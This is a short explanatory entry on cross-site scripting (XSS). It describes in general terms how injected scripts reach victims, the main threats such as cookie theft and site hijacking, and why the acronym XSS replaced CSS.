Cross-site Scripting (XSS)

Cross-site scripting is a vulnerability of Web pages that host dynamic content. Sites use dynamic content to improve the user experience by allowing it to be adapted based on a user's interests or needs. Providing dynamic content requires a Web site to accept input from users. Malicious users, however, can embed malicious code in their input in a disguised form, and this code can be inserted into scripts that other unsuspecting users may receive from the Web site along with other data resulting from legitimate requests. Once these scripts "cross" over to the victim's computer, they can run there to perform various misdeeds, such as hijacking accounts or launching false advertisements.

The four major threats posed by this vulnerability are:

1. phishing attacks
2. attacks on the browser's vulnerabilities
3. site hijacking
4. stealing cookies from the user, which can again lead to session hijacking

The attackers manipulate the scripts of any one of the scripting languages such as JavaScript, VBScript, or even ActiveX, Flash or HTML to obtain the data required from the users. Such a manipulation can embed a script in a page that can be executed every time the page is loaded, or whenever an associated event is performed. Once this has been achieved the attacker has complete capability for performing account hijacking, playing with the user settings, cookie theft or poisoning and even advertising.

XSS attacks are mainly used for identity/sensitive data theft and the defacement of a corporation or Web application. It can also be used for a denial of service attack by simply running a script that blocks the use of the dynamic content on the page.

Cross-site scripting is sometimes abbreviated CSS, but this has been largely replaced by the acronym XSS to avoid confusion with cascading style sheets, which are also abbreviated CSS. CSS is a powerful tool used in defining the style (layout, font, color, etc.) of a Web site.